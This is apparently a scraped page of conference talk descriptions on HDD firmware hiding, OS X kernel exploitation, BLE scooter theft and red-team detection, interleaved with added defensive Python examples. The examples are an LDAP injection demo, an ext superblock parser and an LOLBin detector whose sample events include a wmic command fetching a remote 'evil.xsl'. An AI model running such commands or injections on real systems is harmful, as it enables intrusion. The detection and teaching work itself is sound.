Hard Disk Drives (HDD) have a hidden space for storing data. If malicious software is stored in this hidden area, it could lead to attacks on computers even if they are air-gapped.
By abusing the surplus space of an HDD, such cyber attacks against off-line industrial control systems could become possible.
Moreover, the software or any data in this hidden space can survive formatting, OS reinstallation, malware-destruction software and any conventional cybersecurity framework.
Let us call it "PARADAIS".
While PARADAIS stays unactivated, LBAs are not mapped to the hidden data area. Therefore, even if the HDD is wiped several times, such as 3-pass, 7-pass or 35-pass, it remains there as it is.
There has been no way to detect or erase the unidentified software in PARADAIS in advance when the HDD had been modified prior to your purchase or its installation. However, new solutions are being discovered by my ongoing research.
Who can predict that Windows OS may boot after the HDD is wiped by Enhanced Secure Erase? It would be you at CODEBLUE2016.
The 2nd part of my presentation will be on DATA RECOVERY from HDDs whose platter surface has been damaged because of a head crash, natural disaster or intentional destruction at crime scenes. Survey results of 12 cases show how effective disk surface cleaning by DDRH was.
--- Dai Shimogaito
He has been researching and developing state-of-the-art data recovery technology for malfunctioning HDDs that have suffered platter damage from head crashes, natural disasters and crime.
Dai, as a digital forensic investigator, has also examined digital evidence in cases of murder, abandonment of corpses, internal corporate fraud and labor management problems, and has been cooperating with law enforcement and lawyers.
Moreover, as a cyber security researcher, he has been a speaker at CODEBLUE, the Matcha139 Workshop, seminars for law enforcement and cyber security companies, and the HTCIA International Conference & Training Expo (Aug 2016).
Live Memory Forensics on Android devices - Nikos Gkogkos
This presentation deals with RAM forensics on the Android OS, using the LiME tool to acquire a RAM dump and the Volatility framework for the analysis.
LDAP stands for Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access a distributed directory information service. This video gives a high-level overview of LDAP and some examples of software that uses LDAP, such as Active Directory.
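The security point a practitioner wants alongside an LDAP overview is what happens when application input reaches a search filter unescaped. The following is an added illustrative example, not code from the video or from any LDAP library: it escapes values per RFC 4515, shows a login filter built both ways, and evaluates the filters against a constructed in-memory directory with a deliberately small filter evaluator (only and/or/not, equality, presence and substring items are supported; the directory contents and attribute names are assumptions).

```python
"""LDAP filter escaping per RFC 4515, with a filter-injection demonstration.

Added illustrative example; it is not code from the video or from any LDAP
library. The directory below is a constructed in-memory stand-in for a real
server, and the tiny filter evaluator implements only the subset of RFC 4515
needed here (and/or/not, equality, presence, substring).
"""
import re

# RFC 4515 section 3: these characters must be encoded as \xx inside a value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape untrusted text for use as an assertion value in an LDAP filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def naive_login_filter(username: str) -> str:
    """Vulnerable: user input is concatenated straight into the filter."""
    return f"(&(objectClass=user)(sAMAccountName={username}))"


def safe_login_filter(username: str) -> str:
    """Hardened: metacharacters in the value are escaped, so '*' is literal."""
    return f"(&(objectClass=user)(sAMAccountName={escape_filter_value(username)}))"


# --- minimal filter evaluator (attribute names are compared case-insensitively) ---

def _unescape(value: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def _parse(s: str, i: int):
    """Parse one parenthesised filter item starting at s[i]; return (node, next_i)."""
    if i >= len(s) or s[i] != "(":
        raise ValueError(f"expected '(' at {i}")
    i += 1
    if i >= len(s):
        raise ValueError("truncated filter")
    if s[i] in "&|":
        op, i, children = s[i], i + 1, []
        while i < len(s) and s[i] == "(":
            node, i = _parse(s, i)
            children.append(node)
        if i >= len(s) or s[i] != ")":
            raise ValueError("unterminated and/or")
        return (op, children), i + 1
    if s[i] == "!":
        node, i = _parse(s, i + 1)
        if i >= len(s) or s[i] != ")":
            raise ValueError("unterminated not")
        return ("!", node), i + 1
    end = s.index(")", i)
    attr, sep, raw = s[i:end].partition("=")
    if not sep:
        raise ValueError("only equality/substring/presence items are supported")
    return ("=", attr.lower(), raw), end + 1


def _match(node, entry: dict) -> bool:
    kind = node[0]
    if kind == "&":
        return all(_match(c, entry) for c in node[1])
    if kind == "|":
        return any(_match(c, entry) for c in node[1])
    if kind == "!":
        return not _match(node[1], entry)
    _, attr, raw = node
    actual = entry.get(attr)
    if actual is None:
        return False
    if raw == "*":                      # presence filter
        return True
    # An unescaped '*' splits a substring filter; an escaped \2a stays literal.
    parts = [_unescape(p) for p in raw.split("*")]
    pattern = ".*".join(re.escape(p) for p in parts)
    return re.fullmatch(pattern, actual, re.IGNORECASE) is not None


def search(directory, ldap_filter: str):
    """Return the sAMAccountName of every entry matching ldap_filter."""
    node, end = _parse(ldap_filter, 0)
    if end != len(ldap_filter):
        raise ValueError("trailing characters after filter")
    return [e["samaccountname"] for e in directory if _match(node, e)]


# Constructed directory entries (attribute names lower-cased for lookup).
DIRECTORY = [
    {"objectclass": "user", "samaccountname": "alice", "cn": "Alice Example"},
    {"objectclass": "user", "samaccountname": "bob", "cn": "Bob Example"},
    {"objectclass": "user", "samaccountname": "svc-backup", "cn": "Backup Service"},
    {"objectclass": "computer", "samaccountname": "PRINTER01$", "cn": "PRINTER01"},
]

if __name__ == "__main__":
    print(search(DIRECTORY, naive_login_filter("*")))   # every user: injection
    print(search(DIRECTORY, safe_login_filter("*")))    # [] : literal '*'
```

With the naive filter a username of `*` turns the login lookup into a presence filter and matches every user, and `svc*` enumerates accounts by prefix; with escaping the same input only matches an account literally named `*`. Real deployments should apply the same escaping to DN components (RFC 4514 has its own rules) and bind with least-privilege service accounts, since an injected filter runs with the application's directory rights.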
Are your Oracle databases highly available? You have deployed Real Application Clusters (RAC), Data Guard or Failover Clusters and are well protected against server failures? Great – the prerequisites for a highly available environment are in place. However, to ensure that backend infrastructure failures also remain transparent to the client, an appropriate client-side configuration is required.
This lecture discusses the Oracle technologies that can be used to achieve automatic client failover. What are the advantages, but also the limitations, of these technologies?
A presentation on the Ext4 file system and the evolution of the Ext filesystem family in the Linux operating system. Linux accesses filesystems through a virtual filesystem (VFS) layer. A comparison of the ext filesystem generations is provided.
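The generations differ in the feature flags recorded in the superblock, which is also where an examiner learns the block size and the filesystem's true extent on a device. The following is an added example, not code from the slides or from e2fsprogs: it parses the primary superblock fields needed to identify ext2, ext3 or ext4 and to size the volume, and it builds constructed superblocks in memory so the script runs without a disk image. Offsets and flag values follow the kernel's fs/ext4/ext4.h; the sample volumes, UUID and names are made up.

```python
"""Parse an ext2/ext3/ext4 primary superblock and tell the generations apart.

Added example, not code from the slides or from e2fsprogs. The superblocks
below are constructed in memory with struct.pack so the script runs without
a disk image; read_superblock() shows where the real one lives (1024 bytes
at byte offset 1024 of the partition). Offsets and flag values follow the
kernel's fs/ext4/ext4.h.
"""
import struct

EXT_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024
SUPERBLOCK_SIZE = 1024

COMPAT_HAS_JOURNAL = 0x0004      # ext3 and ext4 have a journal, ext2 does not
COMPAT_DIR_INDEX = 0x0020
INCOMPAT_FILETYPE = 0x0002
INCOMPAT_EXTENTS = 0x0040        # extent-mapped files: ext4 only
INCOMPAT_64BIT = 0x0080          # block count also uses s_blocks_count_hi
INCOMPAT_FLEX_BG = 0x0200
RO_COMPAT_HUGE_FILE = 0x0008
RO_COMPAT_METADATA_CSUM = 0x0400

EXT4_ONLY_INCOMPAT = INCOMPAT_EXTENTS | INCOMPAT_64BIT | INCOMPAT_FLEX_BG
EXT4_ONLY_RO_COMPAT = RO_COMPAT_HUGE_FILE | RO_COMPAT_METADATA_CSUM


def parse_superblock(data: bytes) -> dict:
    """Decode the fields needed for identification and sizing."""
    if len(data) < SUPERBLOCK_SIZE:
        raise ValueError("need at least 1024 bytes")
    (magic,) = struct.unpack_from("<H", data, 0x38)
    if magic != EXT_MAGIC:
        raise ValueError(f"bad magic 0x{magic:04x}, not an ext superblock")
    inodes, blocks_lo = struct.unpack_from("<II", data, 0x00)
    (log_block_size,) = struct.unpack_from("<I", data, 0x18)
    (inode_size,) = struct.unpack_from("<H", data, 0x58)
    compat, incompat, ro_compat = struct.unpack_from("<III", data, 0x5C)
    blocks = blocks_lo
    if incompat & INCOMPAT_64BIT:
        (blocks_hi,) = struct.unpack_from("<I", data, 0x150)
        blocks |= blocks_hi << 32
    return {
        "inodes": inodes,
        "blocks": blocks,
        "block_size": 1024 << log_block_size,
        "inode_size": inode_size,
        "feature_compat": compat,
        "feature_incompat": incompat,
        "feature_ro_compat": ro_compat,
        "uuid": data[0x68:0x78].hex(),
        "volume_name": data[0x78:0x88].split(b"\0", 1)[0].decode("ascii", "replace"),
    }


def classify(sb: dict) -> str:
    """Generation heuristic in the spirit of blkid: journal present, then ext4-only features."""
    if not sb["feature_compat"] & COMPAT_HAS_JOURNAL:
        return "ext2"
    if sb["feature_incompat"] & EXT4_ONLY_INCOMPAT or sb["feature_ro_compat"] & EXT4_ONLY_RO_COMPAT:
        return "ext4"
    return "ext3"


def unallocated_tail(sb: dict, device_size: int) -> int:
    """Bytes on the device beyond the filesystem's last block: space the OS never touches."""
    return device_size - sb["blocks"] * sb["block_size"]


def read_superblock(path: str) -> dict:
    """Read the primary superblock from a raw image or block device."""
    with open(path, "rb") as f:
        f.seek(SUPERBLOCK_OFFSET)
        return parse_superblock(f.read(SUPERBLOCK_SIZE))


def build_superblock(*, inodes, blocks, log_block_size, compat, incompat, ro_compat, volume_name) -> bytes:
    """Constructed test superblock (only the fields parse_superblock() reads are filled)."""
    sb = bytearray(SUPERBLOCK_SIZE)
    struct.pack_into("<II", sb, 0x00, inodes, blocks & 0xFFFFFFFF)
    struct.pack_into("<I", sb, 0x18, log_block_size)
    struct.pack_into("<HH", sb, 0x38, EXT_MAGIC, 1)           # magic, state = cleanly unmounted
    struct.pack_into("<I", sb, 0x4C, 1)                        # rev_level 1: dynamic inode size
    struct.pack_into("<H", sb, 0x58, 256)
    struct.pack_into("<III", sb, 0x5C, compat, incompat, ro_compat)
    sb[0x68:0x78] = bytes(range(16))                           # constructed UUID
    sb[0x78:0x88] = volume_name.encode("ascii").ljust(16, b"\0")
    struct.pack_into("<I", sb, 0x150, blocks >> 32)            # s_blocks_count_hi
    return bytes(sb)


SAMPLE_EXT4 = build_superblock(
    inodes=65536, blocks=(1 << 32) + 1000, log_block_size=2,
    compat=COMPAT_HAS_JOURNAL | COMPAT_DIR_INDEX,
    incompat=INCOMPAT_FILETYPE | INCOMPAT_EXTENTS | INCOMPAT_64BIT | INCOMPAT_FLEX_BG,
    ro_compat=RO_COMPAT_HUGE_FILE | RO_COMPAT_METADATA_CSUM, volume_name="evidence")
SAMPLE_EXT3 = build_superblock(
    inodes=16384, blocks=262144, log_block_size=0,
    compat=COMPAT_HAS_JOURNAL | COMPAT_DIR_INDEX, incompat=INCOMPAT_FILETYPE, ro_compat=0,
    volume_name="")
SAMPLE_EXT2 = build_superblock(
    inodes=16384, blocks=262144, log_block_size=0,
    compat=COMPAT_DIR_INDEX, incompat=INCOMPAT_FILETYPE, ro_compat=0, volume_name="boot")

if __name__ == "__main__":
    for raw in (SAMPLE_EXT2, SAMPLE_EXT3, SAMPLE_EXT4):
        sb = parse_superblock(raw)
        print(classify(sb), sb["volume_name"], sb["blocks"], sb["block_size"])
```

Two points matter in practice: without the 64bit flag the block count is truncated to 32 bits, so sizing a large ext4 volume from s_blocks_count_lo alone is wrong, and unallocated_tail() flags space after the filesystem end that formatting never writes, which a forensic image should still include.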
Presentation by Lorenzo Mangani of QXIP at the October 26 SF Bay Area ClickHouse meetup
https://www.meetup.com/San-Francisco-Bay-Area-ClickHouse-Meetup
https://qxip.net/
Fantastic Red Team Attacks and How to Find Them - Ross Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example is Trusted Developer Utilities, which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL script processing can be used as an attack vector, as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well; these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and a lack of understanding of environmental norms, make reliable detection of these events nearly impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy-to-craft analytics that catch the adversarial behavior most commonly missed in organizations today.
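The abstract's point is that the evidence for these techniques is spread across several events with unrelated noise in between, so a single-event rule misses it. The following is an added example, not code from the talk, from EQL, Red Canary or Atomic Red Team: a small matcher in the spirit of an EQL `sequence ... by pid with maxspan` that links a trusted .NET utility launch to a later network connection from the same process, plus a one-event check for XSL script processing via wmic. The event records and their field names (ts, event_type, pid, process_name, command_line, dest_ip, dest_port) are constructed and are assumptions, not any product's schema.

```python
"""Sequence-style analytic for the LOLBin gaps named in the abstract.

Added example; it is not code from the talk, from EQL, Red Canary or Atomic
Red Team, but a small matcher in the spirit of EQL's
`sequence by pid with maxspan=...`. The event records below are constructed
and their field names (ts, event_type, pid, process_name, command_line,
dest_ip, dest_port) are assumptions, not any product's schema.
"""
from collections import defaultdict

# Trusted .NET / developer utilities from the abstract; legitimate use rarely
# involves an outbound connection, so process -> network is a strong link.
DOTNET_LOLBINS = {"installutil.exe", "regsvcs.exe", "regasm.exe",
                  "addinprocess.exe", "msbuild.exe"}


def sequence(events, stages, by, maxspan):
    """Match `stages` (one predicate per step) in order, joined on field `by`,
    with the whole sequence inside `maxspan` seconds. Events that satisfy no
    stage (the 'nuisance events' between the steps) are simply skipped."""
    pending = defaultdict(list)           # join key -> partial matches in progress
    matches = []
    for event in sorted(events, key=lambda e: e["ts"]):
        key = event.get(by)
        if key is None:
            continue
        for partial in list(pending[key]):
            if event["ts"] - partial[0]["ts"] > maxspan:
                pending[key].remove(partial)        # expired, drop it
                continue
            if stages[len(partial)](event):
                partial.append(event)
                if len(partial) == len(stages):
                    matches.append(tuple(partial))
                    pending[key].remove(partial)
        if stages[0](event):
            pending[key].append([event])
    return matches


def is_lolbin_process(e):
    return e["event_type"] == "process" and e.get("process_name", "").lower() in DOTNET_LOLBINS


def is_network(e):
    return e["event_type"] == "network"


def find_lolbin_network(events, maxspan=300):
    """Trusted developer utility that then talks to the network within maxspan seconds."""
    return sequence(events, [is_lolbin_process, is_network], by="pid", maxspan=maxspan)


def find_xsl_script_exec(events):
    """XSL script processing: wmic.exe with /format: naming a stylesheet or URL.
    (wmic ... /format:list is routine, so a stylesheet or URL is required.)"""
    hits = []
    for e in events:
        if e["event_type"] != "process" or e.get("process_name", "").lower() != "wmic.exe":
            continue
        cl = e.get("command_line", "").lower()
        if "/format:" in cl and (".xsl" in cl or "://" in cl):
            hits.append(e)
    return hits


# Constructed event stream; 203.0.113.0/24 is a documentation address range.
EVENTS = [
    {"ts": 100, "event_type": "process", "pid": 4001, "process_name": "explorer.exe",
     "command_line": "explorer.exe"},
    {"ts": 101, "event_type": "process", "pid": 4120, "process_name": "InstallUtil.exe",
     "command_line": r"InstallUtil.exe /logfile= /LogToConsole=false C:\Users\j\AppData\Local\Temp\upd.exe"},
    {"ts": 102, "event_type": "network", "pid": 4001, "dest_ip": "10.0.0.5", "dest_port": 443},
    {"ts": 103, "event_type": "process", "pid": 4130, "process_name": "wmic.exe",
     "command_line": 'wmic os get /format:"http://203.0.113.7/evil.xsl"'},
    {"ts": 104, "event_type": "process", "pid": 4131, "process_name": "wmic.exe",
     "command_line": "wmic process list /format:list"},
    {"ts": 160, "event_type": "network", "pid": 4120, "dest_ip": "203.0.113.7", "dest_port": 8443},
    {"ts": 170, "event_type": "process", "pid": 4140, "process_name": "MSBuild.exe",
     "command_line": "MSBuild.exe build.proj"},
    {"ts": 900, "event_type": "network", "pid": 4140, "dest_ip": "10.0.0.9", "dest_port": 443},
]

if __name__ == "__main__":
    for proc, net in find_lolbin_network(EVENTS):
        print(f"pid {proc['pid']}: {proc['process_name']} -> {net['dest_ip']}:{net['dest_port']}")
    for e in find_xsl_script_exec(EVENTS):
        print(f"pid {e['pid']}: {e['command_line']}")
```

The join key and time window are what keep the signal-to-noise ratio high: the explorer.exe connection between the two InstallUtil events is ignored because it belongs to another pid, and the MSBuild build that connects out much later falls outside maxspan. Tuning maxspan against the environment's own norms is the work the abstract alludes to.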
Identity and Access Management with One Identity - An Overview - IBsolution GmbH
Content:
Identity and Access Management is the topic of our time. Software-supported management of identities has never been as important as in times of ever more frequent cyber attacks.
In this webinar we present a tool that has achieved wide adoption in the market: the One Identity Manager from the One Identity Suite by Quest Software. It is among the leading products for Identity and Access Management. In the webinar we give you an overview of its functional scope, discuss its strengths and provide valuable insights in a live demo.
Target audience:
- IT security officers, Chief Security Officers (CSO), CIOs
- Process owners in Identity Lifecycle Management or User Lifecycle Management
- IT staff responsible for roles and authorizations
Agenda:
1. Introduction - why One Identity now
2. Overview of the One Identity portfolio
3. One Identity Manager live demo and insights
4. Software architecture, target systems and connectors
More about us:
Website: https://www.ibsolution.com/
Careers: https://ibsolution.de/karriere/
Webinars: https://www.ibsolution.com/academy/webinare
YouTube: https://www.youtube.com/user/IBSolution
LinkedIn: https://de.linkedin.com/company/ibsolution-gmbh
Xing: https://www.xing.com/companies/ibsolutiongmbh
Facebook: https://de-de.facebook.com/IBsolutionGmbH/
Twitter: https://twitter.com/ibsolutiongmbh?lang=de
Instagram: https://www.instagram.com/ibsolution/?hl=de
Further information:
https://www.ibsolution.com/academy/webinar-aufzeichnungen/sap-security-user-access-management-in-hybriden-landschaften-mit-sap-identity-provisioning-service
stackconf 2022: Open Source for Better Observability - NETWAYS
In the cloud native era, systems are getting ever more dynamic and complex. With containers and microservices architectures, monitoring and troubleshooting systems is more challenging than ever before. The open source community has risen to the challenge and delivered solutions that fit modern environments. Open source projects such as Prometheus and the ELK Stack have gathered massive adoption among developers and DevOps engineers, who also carry this skillset between companies and grow the adoption. New open standards, such as OpenMetrics, OpenTracing and OpenTelemetry, are emerging to converge the industry and prevent vendor lock-in. In this talk I will discuss observability, the recommended open source tools and standards, and how to combine them to help you achieve effective observability in your environment.
Digital forensics is the scientific examination and analysis of data held on, or retrieved from, computer storage media in such a way that the information can be used as evidence in a court of law.
Oracle RAC is an option for the Oracle Database Enterprise Edition. At least, this is what it is known for. This presentation shows the many ways in which the stack known as Oracle RAC can be used efficiently for various use cases.
[CB16] (P)FACE: Into Apple's Core, and an Exploit to Root by Moony Li & Jack Tang - CODE BLUE
Security vulnerability research on OS X has become more popular as Mac devices have grown in popularity. The OS X IOKit is exposed to many attacks from hackers through compromise of the kernel itself and of kernel extensions at the transition from user mode. Many researchers are advancing research in this area (see the references), and we would like to share several of our results in this field.
1. A passive fuzzing framework with context enlightenment for detecting kernel vulnerabilities
2. An exploitation technique for occupying kernel memory from a user-mode program in order to bypass SMAP & SMEP
3. How to leverage the vulnerabilities detected by this fuzzing method, and a new exploitation technique that achieved root on OS X twice
We introduce a new technique called PFACE: passive fuzzing with context enlightenment against the OS X IOKit. PFACE has the following characteristics.
First, it allows deep and broad execution and detection of code that is condition-dependent and leads to system crashes. Second, it outputs modules that include the following. Context: an indicator of a suspected vulnerability. The indicator would be useful to reviewers as a means of reviewing the module first.
When you have many vulnerabilities, the major challenge is how to transfer ROP gadgets from a user-mode program into kernel space, because recent OS X enables SMAP and SMEP. The renowned security researcher Stefan Esser has suggested that OSData is a good structure for occupying kernel memory [reference section 5]. Of course OSData is indeed a good data structure. However, in practice there are several issues that prevent OSData from working. We discovered a new technique to make OSData work for occupying kernel memory from a user-mode program, and with this technique we succeeded in detecting new vulnerabilities and obtaining root on OS X (10.11.3).
In fact we have discovered many vulnerabilities with CVEs, and achieved kernel crashes as a result of the fuzzing. We have also established two different local privilege escalation techniques using several vulnerabilities on Mac OS X (10.11.3).
--- Moony Li & Jack Tang
[CB16] BLE authentication design challenges on smartphone controlled IoT devi... - CODE BLUE
Smartphones are commonly used as the controller and Internet gateway for BLE-enabled IoT devices. Designing a strong authentication protocol between them is the key part of IoT security. However, mobile app design has many challenges, such as limited input & output interfaces as well as user privacy protection features. Due to these restrictions, many vendors have given up on BLE's built-in Security Manager protocol and chosen to build their own authentication protocols.
This study focused on a generalized method to analyze these BLE authentication protocols, discovering and solving the challenges mentioned above. We applied this method to commercial products, including the popular Gogoro Smart Scooter from Taiwan. We will demo that under certain circumstances it is possible to dump the key used to unlock your Gogoro Scooter and send fake BLE authentication protocol packets to steal the scooter.
--- Chen-yu Dai [GD]
Chen-yu Dai (GD) is CTO at Team T5 Research, providing Digital Forensics & Incident Response services, developing Threat Intelligence programs and platforms, and consulting on enterprise cyber defenses.
He is studying at the graduate school of the Department of Information Management at the National Taiwan University of Science and Technology.
He also volunteers as deputy coordinator of HITCON, the largest hacker community and security conference in Taiwan.
He has received many prizes from domestic and international CTFs, as well as bug bounty programs.
--- Shi-Cho Cha [CSC]
Shi-Cho Cha (CSC) is currently an associate professor at the Department of Information Management of the National Taiwan University of Science and Technology, where he has been a faculty member since 2006. He received his B.S. and Ph.D. in Information Management from National Taiwan University in 1996 and 2003. He is a certified PMP, CISSP, CCFP and CISM. From 2000 to 2003, he was a senior consultant at eLand Technologies and acted as project leader for the development of several e-marketing systems. From 2003 to 2006, he was a manager at PricewaterhouseCoopers Taiwan and helped several major government agencies develop their information security management systems.
Recently, he has helped NTUST establish a security analysis workforce and helped several organizations evaluate their system security. His current research interests are in the areas of information security management, identity management, smartphone security and IoT security.
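The abstract above describes two distinct failures a home-grown BLE unlock protocol can have: packets that can simply be replayed, and a key that can be dumped from the app and used to forge valid packets. The following is an added example, not code from the talk and not Gogoro's or any vendor's protocol: a replayable static-token design next to a nonce-bound challenge-response design, exercised by a sniff-and-replay attacker and by an attacker holding a dumped key. The key, nonce size and packet layout are assumptions chosen for illustration, and the "link" is just the bytes handed from one function to another.

```python
"""Replayable token vs. challenge-response unlock over a BLE-style link.

Added example, not code from the talk and not Gogoro's or any vendor's
protocol; the 'link' is the bytes passed between functions, and the key,
nonce size and message layout are assumptions chosen for illustration.
"""
import hashlib
import hmac
import os

DEMO_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed demo key


class StaticTokenLock:
    """Weak custom design: the app always sends the same key-derived token."""

    def __init__(self, key: bytes):
        self._key = key

    @staticmethod
    def app_unlock_packet(key: bytes) -> bytes:
        return b"UNLK" + hashlib.sha256(b"unlock" + key).digest()

    def verify(self, packet: bytes) -> bool:
        return hmac.compare_digest(packet, self.app_unlock_packet(self._key))


class ChallengeResponseLock:
    """Lock issues a fresh random challenge; the app proves key knowledge with
    HMAC(key, challenge || command). Each challenge is valid exactly once."""

    def __init__(self, key: bytes):
        self._key = key
        self._outstanding = None

    def challenge(self) -> bytes:
        self._outstanding = os.urandom(16)
        return self._outstanding

    @staticmethod
    def app_response(key: bytes, challenge: bytes, command: bytes = b"unlock") -> bytes:
        return b"RESP" + hmac.new(key, challenge + command, hashlib.sha256).digest()

    def verify(self, packet: bytes, command: bytes = b"unlock") -> bool:
        if self._outstanding is None:
            return False
        expected = self.app_response(self._key, self._outstanding, command)
        self._outstanding = None            # consumed: a replay finds no open challenge
        return hmac.compare_digest(packet, expected)


def replay_against_static_token() -> bool:
    """Sniffer captures one legitimate unlock and replays it later. True if accepted."""
    lock = StaticTokenLock(DEMO_KEY)
    captured = StaticTokenLock.app_unlock_packet(DEMO_KEY)   # legit session, seen over the air
    assert lock.verify(captured)
    return lock.verify(captured)                              # attacker replays the same bytes


def replay_against_challenge_response() -> bool:
    """Same attacker against the challenge-response design."""
    lock = ChallengeResponseLock(DEMO_KEY)
    captured = ChallengeResponseLock.app_response(DEMO_KEY, lock.challenge())
    assert lock.verify(captured)
    lock.challenge()                                          # attacker opens a new session
    return lock.verify(captured)                              # old response no longer matches


def forge_with_dumped_key() -> bool:
    """If the key can be dumped from the app, challenge-response does not help:
    the attacker answers the lock's fresh challenge correctly."""
    lock = ChallengeResponseLock(DEMO_KEY)
    dumped_key = DEMO_KEY                                     # obtained from the phone, not the air
    return lock.verify(ChallengeResponseLock.app_response(dumped_key, lock.challenge()))


if __name__ == "__main__":
    print("replay vs static token:", replay_against_static_token())
    print("replay vs challenge-response:", replay_against_challenge_response())
    print("forgery with dumped key:", forge_with_dumped_key())
```

The challenge binds each response to a fresh random value and to the command, so a captured packet is useless afterwards; but the third function shows why the abstract's dumped-key demo defeats even a sound protocol. Where the key lives on the phone, and whether it is per device and per user rather than shared, decides the outcome regardless of the message format.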
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho - CODE BLUE
This talk will show esoteric web application vulnerabilities in detail. These vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items from merchants that use PayPal as their payment gateway without actually paying. SQL injections are dead, and I don't care: let's explore the world of null, nil and NULL; NoSQL injections; host header injections that lead to phone call audio interception; PayPal's double spend and Rails' MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert who currently leads the community-driven, open source w3af project and provides in-depth web application penetration testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3Com and ISS, contributed to SAP research performed at one of his former employers, and reported vulnerabilities in hundreds of web applications.
His main focus has always been the web application security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and held trainings at many security conferences around the globe, such as BlackHat (USA and Europe), SEC-T (Sweden), DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland), CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada), PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated web application vulnerability detection and exploitation.
[CB16] Using the CGC's fully automated vulnerability detection tools in secur... - CODE BLUE
End-users' requirements for secure IT products are continually increasing in environments that directly affect human life and industry, such as IoT and CPS. Because vendors and end-users sell or buy products based on trustworthy or objective security evaluation results, the role of security evaluation is important. Security evaluations are divided into two parts: one is evaluation at the design level, such as ISO/IEC 29128 (Verification of Cryptographic Protocols), and the other is at the post-implementation level, such as ISO/IEC 15408 (Common Criteria). Both of these security evaluation standards, ISO/IEC 29128 and ISO/IEC 15408, advise the use of formal verification and automated tools when a high assurance level for the target product is required.
For a long time, vulnerability detection using automated tools has been tried and studied by many security researchers and hackers. And recently, studies related to automated vulnerability detection have become more active than ever in the hacking community with DARPA's CGC (Cyber Grand Challenge). But too many tools are being developed continually, and each tool usually has its own purpose, so it is hard to achieve the ultimate goal of security evaluation effectively and to verify evaluation results.
Furthermore, there are no references for categorizing automated tools from the perspective of security evaluation. So, in this presentation we will list, categorize and analyze automated tools for vulnerability detection and introduce our results, such as pros and cons, purpose, effectiveness, etc.
-- InHyuk Seo
My name is Inhyuk Seo (nick: inhack). I graduated with a B.S. in Computer Science and Engineering from Hanyang University (ERICA) in 2015. Now I'm a researcher and M.S. student in the SANE (Security Analysis aNd Evaluation) Lab at Korea University. I'm interested in programming languages, software testing, machine learning and artificial intelligence.
In 2012, I completed the high-quality information security education course "Best of the Best (BoB)" hosted by KITRI (Korea Information Technology Research Institute) and conducted the "Exploit Decoder for Obfuscated JavaScript" project.
I participated in many projects related to vulnerability analysis. I conducted "Smart TV Vulnerability Analysis and Security Evaluation" and "Developing Mobile Security Solution (EAL4) for Military Environment". I also participated in a vulnerability analysis project for IoT products of various domestic telecommunications companies.
-- Jisoo Park
Jisoo Park graduated from Dongguk University with a B.S. in Computer Science Engineering. He participated in a secure coding research project in the Programming Language Lab and at KISA (Korea Internet & Security Agency). He worked as a software QA tester at the anti-virus company AhnLab. He also completed the high-quality information security education course "Best of the Best" hosted by KITRI (Korea Information Technology Research Institute) and conducted security consulting for a car sharing service company.
Now, Jisoo Park is a
Preventing hard disk firmware manipulation attack and disaster recovery by Da... - CODE BLUE
In this talk I will explain strategies, prior to and after a hard disk has lost its ability to be used as a storage device due to human manipulation or natural disaster, that allow a high probability of data recovery. The clicking sound of a hard disk's head is synonymous with hard disk failure; however, it is not widely known that this clicking sound can occur even when there is nothing wrong with the head. Changing the hard disk's head merely because it is acting up is a very risky action, because it increases the danger of damaging the clean insides of the hard disk. So what is causing the hard disk's head clicking sound? The answer is damaged firmware. In this talk I will explain how to utilize the firmware to control the device and use it in a disaster recovery situation.
Dai Shimogaito
CEO of Osaka Data Recovery, founded in 1998. Director of the Data Recovery Association Japan.
Wanting to perfect data recovery methods, he conducts research and information exchange with engineers domestically and internationally.
Trainings: data recovery trainings for NPA and IDF seminars, etc.
Lectures: Digital Forensic Study Groups, NTT Secure Platform Laboratories, and privately for companies and governments
The newest Western Digital hard drive repair doctor - Chez Ludovic
This newest Western Digital hard drive repair doctor repairs firmware corruption, clears passwords, modifies capacity and serial number, etc., and helps to fix drives that are not detected by the PC.
This book, written by Ann Leflore, contains extensive Hitachi/IBM data recovery knowledge, tips and case studies, and will definitely add to your Hitachi data recovery success rate.
Btrfs and Snapper - The Next Steps from Pure Filesystem Features to Integrati... - Gábor Nyers
These are the slides of our SUSECon 2013 presentation with Arvin (the inventor of Snapper).
